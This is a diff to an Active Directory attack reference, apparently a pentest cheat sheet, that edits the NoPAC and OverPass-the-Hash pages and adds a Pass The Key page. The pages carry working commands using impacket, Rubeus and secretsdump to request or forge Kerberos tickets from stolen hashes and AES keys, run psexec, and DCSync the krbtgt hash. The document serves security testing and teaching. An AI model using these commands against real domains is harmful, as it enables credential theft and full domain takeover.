Pass The Key

docs/active-directory/CVE/NoPAC.md

@@ -32,7 +32,7 @@
     ```
 1. Clear the controlled machine account `servicePrincipalName` attribute
     ```ps1
-    impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
+    krbrelayx@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
 
     powershell@windows> . .\Powerview.ps1
     powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
@@ -63,7 +63,10 @@
 
     cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
     ```
-6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'`
+6. DCSync
+    ```ps1
+    KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
+    ```
 
 Automated exploitation:
 

docs/active-directory/hash-over-pass-the-hash.md

@@ -1,6 +1,6 @@
 # Hash - OverPass-the-Hash
 
-In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
+> In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT).
 
 
 ### Using impacket
@@ -10,9 +10,6 @@ root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ro
 root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
 root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
 
-# also with the AES Key if you have it
-root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
-
 root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
 root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
 root@kali:~$ klist
@@ -26,9 +23,6 @@ root@kali:~$ klist
 # NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
 
-# More stealthy variant, but requires the AES256 hash
-.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
-
 # Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
 .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
 ```

docs/active-directory/hash-pass-the-key.md

@@ -0,0 +1,57 @@
+# Hash - Pass The Key
+
+Pass The Key allows attackers to gain access to systems by using a valid session key instead of the user's password or NTLM hash. This technique is related to other credential-based attacks like Pass The Hash (PTH) and Pass The Ticket (PTT) but specifically uses session keys to authenticate.
+
+Pre-authentication requires the requesting user to provide a secret key, which is derived from their password and may use encryption algorithms such as DES, RC4, AES128, or AES256.
+
+* **RC4**: ARCFOUR-HMAC-MD5 (23), in this format, this is the NTLM hash, go to **Pass The Hash** to use it directly and **Over Pass The Hash** page to request a TGT from it.
+* **DES**: DES3-CBC-SHA1 (16), should not be used anymore and have been deprecated since 2018 ([RFC 8429](https://www.rfc-editor.org/rfc/rfc8429)).
+* **AES128**: AES128-CTS-HMAC-SHA1-96 (17), both AES encryption algorithms can be used with Impacket and Rubeus tools.
+* **AES256**: AES256-CTS-HMAC-SHA1-96 (18)
+
+In the past, there were more encryptions methods, that have now been deprecated.
+
+| enctype                    | weak?| krb5   | Windows |
+| -------------------------- | ---- | ------ | ------- |		
+| des-cbc-crc                | weak	| <1.18	 | >=2000  | 
+| des-cbc-md4                | weak	| <1.18	 | ?       | 
+| des-cbc-md5                | weak	| <1.18	 | >=2000  | 
+| des3-cbc-sha1              | 	 	| >=1.1	 | none    | 
+| arcfour-hmac               | 	 	| >=1.3	 | >=2000  | 
+| arcfour-hmac-exp           | weak	| >=1.3	 | >=2000  | 
+| aes128-cts-hmac-sha1-96    | 	 	| >=1.3	 | >=Vista | 
+| aes256-cts-hmac-sha1-96	 |      | >=1.3	 | >=Vista | 
+| aes128-cts-hmac-sha256-128 | 	 	| >=1.15 | none    | 
+| aes256-cts-hmac-sha384-192 | 	 	| >=1.15 | none    | 
+| camellia128-cts-cmac	 	 |      | >=1.9	 | none    | 
+| camellia256-cts-cmac	 	 |      | >=1.9	 | none    | 
+
+Microsoft Windows releases Windows 7 and later disable single-DES enctypes by default.
+
+
+Either use the AES key to generate a ticket with `ticketer`, or request a new TGT using `getTGT.py` script from Impacket.
+
+## Generate a new ticket
+
+* [fortra/impacket/ticketer.py](https://github.com/fortra/impacket/blob/master/examples/ticketer.py)
+    ```powershell
+    impacket-ticketer -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 -domain lab.local Administrator -domain-sid S-1-5-21-2218639424-46377867-3078535060
+    ```
+
+## Request a TGT
+
+* [fortra/impacket/getTGT.py](https://github.com/fortra/impacket/blob/master/examples/getTGT.py)
+    ```powershell
+    impacket-getTGT -aesKey 2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 lab.local
+    ```
+
+* [GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)
+    ```powershell
+    .\Rubeus.exe asktgt /user:Administrator /aes128 bc09f84dcb4eabccb981a9f265035a72 /ptt
+    .\Rubeus.exe asktgt /user:Administrator /aes256:2ef70e1ff0d18df08df04f272df3f9f93b707e89bdefb95039cddbadb7c6c574 /opsec /ptt
+    ```
+
+
+## References
+
+* [MIT Kerberos Documentation - Encryption types](https://web.mit.edu/kerberos/krb5-1.18/doc/admin/enctypes.html)